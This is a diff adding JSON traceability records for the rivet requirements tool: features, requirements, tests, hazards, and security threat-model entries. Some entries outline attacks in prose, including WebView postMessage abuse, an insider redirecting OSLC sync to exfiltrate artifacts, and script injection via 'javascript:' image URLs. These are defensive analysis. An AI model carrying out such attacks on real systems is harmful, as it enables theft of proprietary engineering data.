+      "description": "Model rivet's own system and software architecture as AADL components in arch/. Three packages: RivetSystem (top-level), RivetAdapters (extensibility), RivetDashboard (serve/UI). Architecture artifacts trace to requirements via allocated-from.\n",
+      "id": "FEAT-019",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "aadl",
+        "architecture",
+        "dogfood",
+        "phase-2"
+      ],
+      "title": "AADL architecture dogfood (rivet self-model)",
+      "type": "feature"
+    },
+    {
+      "description": "Unit tests for the markdown-to-HTML pipeline in document.rs: heading level rendering, wiki-link [[ID]] resolution to artifact-ref and doc-ref anchors, broken reference rendering as .artifact-ref.broken, cross-document reference resolution when document_exists returns true, and code block passthrough.\n",
+      "id": "TEST-013",
+      "links": [
+        {
+          "target": "REQ-032",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "markdown",
+        "documents",
+        "swe-4"
+      ],
+      "title": "Markdown rendering tests",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-C-13",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-13",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "spar:SPAR-PROC-001",
+      "links": [
+        {
+          "target": "spar:SPAR-THR-001",
+          "type": "contains"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "aadl",
+        "process"
+      ],
+      "title": "Main processing thread",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Tests for the Language Server Protocol server. Verifies initialization handshake, textDocument/didOpen and didSave notifications trigger re-validation, publishDiagnostics emits correct artifact-level diagnostics, completion provider suggests artifact IDs and link types, goto-definition resolves artifact references to file locations, and hover shows artifact summaries.\n",
+      "id": "TEST-031",
+      "links": [
+        {
+          "target": "REQ-029",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "lsp",
+        "swe-5"
+      ],
+      "title": "LSP server protocol and handler tests",
+      "type": "feature"
+    },
+    {
+      "description": "The validation pipeline must support incremental recomputation where changing a single artifact file only re-evaluates affected validation rules, link graph edges, and coverage computations. Uses salsa for dependency tracking, consistent with the spar AADL toolchain. This enables sub-millisecond revalidation for IDE integration and efficient conditional rule evaluation. Incremental results must be identical to full validation results for the same inputs.\n",
+      "id": "REQ-029",
+      "links": [
+        {
+          "target": "SC-11",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-11",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-21",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-003",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-006",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-007",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-10",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-11",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-13",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-14",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-26",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "salsa",
+        "incremental",
+        "performance"
+      ],
+      "title": "Incremental validation via dependency-tracked computation",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests for the AADL adapter (FEAT-018 and FEAT-019). Verifies spar CLI JSON output parsing, component type and implementation extraction, aadl-component and aadl-analysis-result artifact creation, allocated-from link generation to requirements, and self-model dogfood validation of the arch/ directory AADL files.\n",
+      "id": "TEST-033",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-005",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "aadl",
+        "adapter",
+        "swe-5"
+      ],
+      "title": "AADL adapter and architecture model tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nA malicious VS Code extension installed in the same workspace\n\nobtains a reference to the rivet dashboard WebView panel. It\n\nposts a message { type:\n\"navigate\",\npath:\n\"/artifacts\"\n}\nto\n\nthe WebView. The dashboard's message handler does not check\n\nevent.origin or event.source and processes the command,\nreturning\n\nthe full artifact list HTML to the caller via a response\n\npostMessage. The malicious extension extracts proprietary\n\nrequirement text from the HTML payload and exfiltrates it to\n\nan external server.\n",
+      "id": "LS-L-5",
+      "links": [
+        {
+          "target": "UCA-C-27",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-20",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "VS Code extension postMessage handler accepts navigation commands from any origin",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "MCP tool responses must use project-relative paths only. Error messages must sanitize paths before returning to the client.\n",
+      "id": "SSC-IMPL-006",
+      "links": [
+        {
+          "target": "SH-IMPL-002",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP tool results MUST NOT include absolute file paths",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "Update aspice.yaml to v4.0 terminology: rename artifact types from *-test to *-verification, expand method values, add verification-criteria. Cybersecurity (SEC.1-4, ISO 21434) is a separate composable schema file rather than embedded in aspice.yaml.\n",
+      "id": "DD-010",
+      "links": [
+        {
+          "target": "REQ-015",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "schema",
+        "aspice",
+        "cybersecurity"
+      ],
+      "title": "ASPICE 4.0 verification terminology and composable cybersecurity schema",
+      "type": "design-decision"
+    },
+    {
+      "description": "rivet snapshot capture/diff/list commands. Captures project state (stats, coverage, diagnostics) to JSON. Delta computation with NEW/RESOLVED diagnostic tracking.\n",
+      "id": "FEAT-077",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Snapshot capture and diff for release-to-release delta",
+      "type": "feature"
+    },
+    {
+      "description": "Validate link integrity, coverage completeness, required fields, allowed values, and traceability rules. Report diagnostics with severity levels (error, warning, info).\n",
+      "id": "REQ-004",
+      "links": [
+        {
+          "target": "SC-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-3",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-15",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-15",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-002",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-004",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-IMPL-001",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-IMPL-004",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-IMPL-006",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-5",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-6",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-7",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-8",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-9",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-24",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-25",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-D-3",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "validation"
+      ],
+      "title": "Validation engine",
+      "type": "requirement"
+    },
+    {
+      "description": "\nMODULE.bazel uses string concatenation,\nvariable references,\nor\n\nload() statements that the Starlark subset parser does not handle.\n\nThe parser silently skips the unrecognized construct,\nmissing a\n\ndependency declaration.\n",
+      "id": "H-11.2",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet parser fails on valid Starlark syntax it does not support",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "\nCore validates an artifact against the wrong schema.\n",
+      "id": "UCA-C-6",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nOSLC client syncs a deletion event from the remote tool,\n\nremoving a locally-needed artifact without confirmation.\n",
+      "id": "UCA-O-5",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Optional common-mistakes and example fields on ArtifactTypeDef. Surfaced in rivet schema show output for AI agents and developers.\n",
+      "id": "FEAT-091",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Schema guidance fields (common-mistakes, example)",
+      "type": "feature"
+    },
+    {
+      "description": "Uses FNV-1a hash of diagnostic message for fingerprinting rather than exact string comparison.\n",
+      "id": "DD-045",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Failure signature fingerprinting for convergence detection",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nDeveloper runs `rivet import data.xml` without specifying an\n\nadapter.  The CLI's process model infers the adapter from the\n\nfile extension (.xml → ReqIF adapter).  However,\nthe file is\n\nactually an OSLC RDF/XML resource description,\nnot ReqIF.  The\n\nReqIF adapter fails to parse the RDF structure and either crashes\n\nor produces garbage artifacts [UCA-L-4,\nH-4].\n",
+      "id": "LS-L-2",
+      "links": [
+        {
+          "target": "UCA-L-4",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Wrong adapter selected for ambiguous file format",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nNon-determinism in the evaluator (e.g.,\nhash map iteration order,\n\nparallel evaluation races,\nor platform-dependent floating-point in\n\naggregation) causes different validation results on different\n\nmachines or runs. This breaks reproducibility — a variant that passes\n\nin CI fails on a developer's machine or vice versa.\n",
+      "id": "H-VAR-007",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Different users get different validation results for the same variant",
+      "type": "hazard"
+    },
+    {
+      "description": "An adversary modifies stored artifacts, link targets, or schema validation rules without detection.  Silent corruption is particularly severe: engineers and auditors continue to trust the store, certification evidence is fabricated, and safety gaps are hidden until field failure.\n",
+      "id": "SL-2",
+      "links": [],
+      "status": "approved",
+      "tags": [],
+      "title": "Integrity loss — traceability artifacts silently corrupted",
+      "type": "sec-loss"
+    },
+    {
+      "description": "",
+      "id": "CC-C-16",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-16",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA markdown document references an image with a `javascript:` or\n\n`data:` URL scheme. The parse_markdown_link function in document.rs\n\nonly allows http/https/# URLs,\nbut the img tag rendering path may\n\nnot apply the same restriction,\nenabling script injection via\n\ncrafted image sources.\n",
+      "id": "H-13.2",
+      "links": [
+        {
+          "target": "H-13",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet document renderer passes markdown image URLs without validation",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "",
+      "id": "spar:SPAR-THR-001",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "aadl",
+        "thread"
+      ],
+      "title": "Worker thread",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nSafety-critical requirements are not properly tracked through design,\n\nimplementation,\nand verification,\ncreating undetected gaps in the\n\nsafety argument.  This can result in hazardous system behavior reaching\n\nproduction.\n",
+      "id": "L-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of safety assurance",
+      "type": "loss"
+    },
+    {
+      "description": "13 artifact types with class-conditional verification rules for medical device software (Class A/B/C).\n",
+      "id": "FEAT-099",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "IEC 62304 medical device software schema",
+      "type": "feature"
+    },
+    {
+      "description": "Eighteen cross-module integration tests exercising the full pipeline: dogfood validation, generic YAML roundtrip, schema merge, traceability matrix, query filters, link graph, ASPICE rules, store upsert, ReqIF roundtrip, diff computation, and diagnostic diffing.\n",
+      "id": "TEST-007",
+      "links": [
+        {
+          "target": "REQ-003",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-007",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Integration test suite",
+      "type": "feature"
+    },
+    {
+      "description": "Implemented MCP protocol manually using serde_json rather than adding rmcp dependency.\n",
+      "id": "DD-044",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "MCP over raw JSON-RPC instead of rmcp crate",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-C-1",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nCore WASM runtime leaks host filesystem paths to the guest\n\nadapter via WASI preopened directories.\n",
+      "id": "UCA-C-23",
+      "links": [
+        {
+          "target": "H-14",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-17",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore's process model includes a set of known schemas loaded from\n\nrivet.yaml.  When an imported artifact declares a type not present\n\nin any loaded schema (e.g.,\n\"spec-object\"\nfrom a ReqIF import that\n\nwasn't mapped),\nCore's process model has no entry for this type.\n\nThe algorithm falls back to accepting the artifact without schema\n\nvalidation [UCA-C-6],\nbelieving it is an extension type that does\n\nnot require validation.  The artifact may contain arbitrary fields\n\nand invalid links [H-4].\n",
+      "id": "LS-C-3",
+      "links": [
+        {
+          "target": "UCA-C-6",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Schema fallback accepts unknown artifact types",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nWhen the LSP server receives a textDocument/didSave notification,\n\nit must invalidate the salsa cache for the changed file and\n\nre-publish diagnostics within 500 ms for projects containing\n\nfewer than 5000 artifacts.  Stale cached results must never be\n\nreturned after a save event.\n",
+      "id": "SC-21",
+      "links": [
+        {
+          "target": "H-19",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP must re-validate within 500ms of file save for stores under 5000 artifacts",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The system must detect which artifacts changed between two baselines or commits and compute the transitive set of downstream artifacts affected via the link graph. This supports change management workflows required by ASPICE SUP.10 and ISO 26262 part 8.\n",
+      "id": "REQ-024",
+      "links": [
+        {
+          "target": "SC-3",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-IMPL-002",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "traceability",
+        "baseline",
+        "safety"
+      ],
+      "title": "Change impact analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "\nWhen loading schemas with conditional rules,\nRivet must check that\n\nno combination of conditions can produce contradictory requirements\n\non a single artifact. Inconsistent rule sets must be rejected at\n\nschema load time with a diagnostic identifying the conflicting rules.\n",
+      "id": "SC-12",
+      "links": [
+        {
+          "target": "H-10",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must verify conditional rule consistency before applying rules",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Extends rivet validate with cross-repo link checks including validate_refs (external artifact existence), detect_circular_deps (cycles across repo boundaries), and detect_version_conflicts (divergent pins for the same external).\n",
+      "id": "FEAT-038",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "validation"
+      ],
+      "title": "Cross-repo link validation in rivet validate",
+      "type": "feature"
+    },
+    {
+      "description": "\nDashboard WebView provides artifact data to untrusted iframe\n\norigins via postMessage.\n",
+      "id": "UCA-C-27",
+      "links": [
+        {
+          "target": "H-20",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "The EmbedRequest parser processes content from user-authored documents. Malformed or adversarial embed syntax could trigger unexpected behavior in the resolver.\n",
+      "id": "SH-IMPL-003",
+      "links": [
+        {
+          "target": "SL-IMPL-003",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "Embed resolver processes untrusted input",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "",
+      "id": "ARCH-SYS-002",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "system"
+      ],
+      "title": "Rivet System Implementation",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Unit tests for the diff, document, and store modules. Verifies artifact storage, retrieval, upsert, by-type indexing, YAML frontmatter parsing, document reference extraction, HTML rendering, and structural diff computation between store snapshots.\n",
+      "id": "TEST-001",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "swe-4"
+      ],
+      "title": "Store and model unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nDuring OSLC TRS sync,\nReqIF import/export,\nor YAML merge operations,\n\nartifacts or their links are discarded without user notification.\n\nThe lost data may include safety-critical requirements or their\n\nverification evidence.\n",
+      "id": "H-2",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet silently drops artifacts or links during synchronization",
+      "type": "hazard"
+    },
+    {
+      "description": "\nIf the constraint solver accepts a variant configuration,\nevery\n\ncross-tree constraint in the feature model must hold for the derived\n\neffective feature set. Soundness is non-negotiable; completeness\n\n(rejecting valid configs) is acceptable as a conservative failure mode.\n",
+      "id": "SC-VAR-002",
+      "links": [
+        {
+          "target": "H-VAR-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Constraint solver must be sound — accepted configurations must satisfy all constraints",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The system must support FODA-style feature models that describe the logical problem space of a product line. Feature models define a tree of features with group types (mandatory, optional, alternative, or) and cross-tree constraints expressed as s-expressions (implies, excludes, requires). Feature models are stored as YAML artifacts separate from implementation artifacts, maintaining the separation between logical (problem space) and implementation (solution space) concerns. Feature models must be validatable independently — the constraint set must be satisfiable.\n",
+      "id": "REQ-042",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "feature-model"
+      ],
+      "title": "Feature model for product line engineering",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-C-11",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-11",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "An insider with repository write access modifies rivet.yaml to change the OSLC server URL from the legitimate Polarion host to an attacker- controlled HTTPS server.  On next scheduled 'rivet sync', Rivet authenticates to the adversary's server (using stored credentials from environment variables), sends the full artifact payload, and accepts the adversary's crafted response artifacts.  The legitimate OSLC server is not contacted.  The insider can exfiltrate the entire artifact database in a single sync operation.\n",
+      "id": "SLS-6",
+      "links": [
+        {
+          "target": "SUCA-OSLC-1",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-5",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "rivet.yaml OSLC URL hijack — insider redirects sync to exfiltration endpoint",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "Pre-commit hook entry point that validates a single commit message file. Parses conventional-commit type for exemption, checks for skip trailer, extracts artifact IDs from git trailers, and validates they exist in the artifact store. Provides fuzzy-match suggestions on typos.\n",
+      "id": "FEAT-029",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-018",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "git",
+        "traceability",
+        "phase-3"
+      ],
+      "title": "rivet commit-msg-check subcommand",
+      "type": "feature"
+    },
+    {
+      "description": "Imports canonical YAML artifact files. Primary format for hand-authored artifacts.\n",
+      "id": "ARCH-ADAPT-GENERIC",
+      "links": [
+        {
+          "target": "FEAT-002",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "adapter"
+      ],
+      "title": "Generic YAML Adapter",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Engineering artifacts (requirements, safety analyses, design decisions, architecture documents) are disclosed to unauthorized parties.  In safety-critical or defense programs, artifact content may be export- controlled, trade-secret, or security-classified.  Unauthorized disclosure could expose competitive IP, enable targeted attacks, or trigger regulatory violations.\n",
+      "id": "SL-1",
+      "links": [],
+      "status": "approved",
+      "tags": [],
+      "title": "Confidentiality loss — proprietary engineering artifacts disclosed",
+      "type": "sec-loss"
+    },
+    {
+      "description": "All parsers for build-system manifests and configuration files must produce lossless concrete syntax trees (CST) with full span information for byte-exact error reporting. Parsers must recover from errors and produce partial results rather than failing completely. Uses rowan for CST representation, consistent with the spar AADL toolchain.\n",
+      "id": "REQ-028",
+      "links": [
+        {
+          "target": "SC-13",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-13",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-001",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-LSP-005",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "parsing",
+        "rowan",
+        "diagnostics"
+      ],
+      "title": "Diagnostic-quality parsing with lossless syntax trees",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe LSP server's salsa incremental database is not invalidated when\n\na file is saved via textDocument/didSave.  The cached diagnostics\n\nfrom a previous file version are returned to the editor as current\n\nvalidation results.  In a worst-case environment where the developer\n\ntrusts the editor's inline diagnostics,\nstale PASS results hide\n\nnewly introduced traceability violations.\n",
+      "id": "H-19",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP server provides stale validation results after file change",
+      "type": "hazard"
+    },
+    {
+      "description": "Snapshot JSON files are deserialized with serde_json. While JSON is safer than YAML (no code execution), a maliciously large file could cause memory exhaustion.\n",
+      "id": "SH-IMPL-004",
+      "links": [
+        {
+          "target": "SL-IMPL-001",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "YAML deserialization of untrusted snapshot files",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "\nSynchronization client that connects to external ALM tools via\n\nOSLC Core 3.0 and Tracked Resource Set (TRS) protocols.  Handles\n\nbidirectional artifact sync,\nconflict detection,\nand change-log\n\nprocessing.\n",
+      "id": "CTRL-OSLC",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "OSLC Client",
+      "type": "controller"
+    },
+    {
+      "description": "HTML export renders documents using the same axum server-side rendering pipeline as the dashboard, with wiki-links and artifact embeds resolved statically. Documents are output as individual HTML pages in a docs/ subdirectory.\n",
+      "id": "DD-037",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "export",
+        "documents",
+        "architecture"
+      ],
+      "title": "Document pages in HTML export via axum/embed rendering pipeline",
+      "type": "design-decision"
+    },
+    {
+      "description": "Six proptest properties verifying store insert/lookup consistency, duplicate rejection, schema merge idempotence, link graph backlink symmetry, validation determinism, and type iterator correctness. Runs 30-50 randomized cases per property.\n",
+      "id": "TEST-006",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-004",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-010",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "Property-based tests (proptest)",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore document validation only checks [[ID]]\nreferences but does\n\nnot validate {{artifact:ID}}\nembed references.\n",
+      "id": "UCA-C-25",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "The dashboard's HTML rendering pipeline provides artifact field content (title, description, document body) directly into HTML templates without escaping HTML entities.\n",
+      "id": "SUCA-DASH-2",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-4",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Dashboard provides un-escaped artifact content in HTML responses",
+      "type": "sec-uca"
+    },
+    {
+      "description": "8 artifact types covering functional insufficiency hazards, triggering conditions, and known/unknown unsafe scenarios.\n",
+      "id": "FEAT-101",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "ISO 21448 SOTIF schema",
+      "type": "feature"
+    },
+    {
+      "description": "Nine unit tests for the results module verifying TestStatus display and predicate methods, ResultStore insert ordering, latest_for and history_for queries, aggregate summary statistics, YAML roundtrip serialization, and edge case handling for empty and nonexistent result directories.\n",
+      "id": "TEST-010",
+      "links": [
+        {
+          "target": "REQ-009",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "results",
+        "swe-4"
+      ],
+      "title": "Results model tests",
+      "type": "feature"
+    },
+    {
+      "description": "Playwright browser automation tests for the dashboard (FEAT-009). Verifies page navigation, artifact detail view rendering, traceability matrix interactivity, graph pan/zoom/drag, Cmd+K search, hover previews, document viewer rendering, source viewer with line anchors, and self-contained asset loading (no CDN requests).\n",
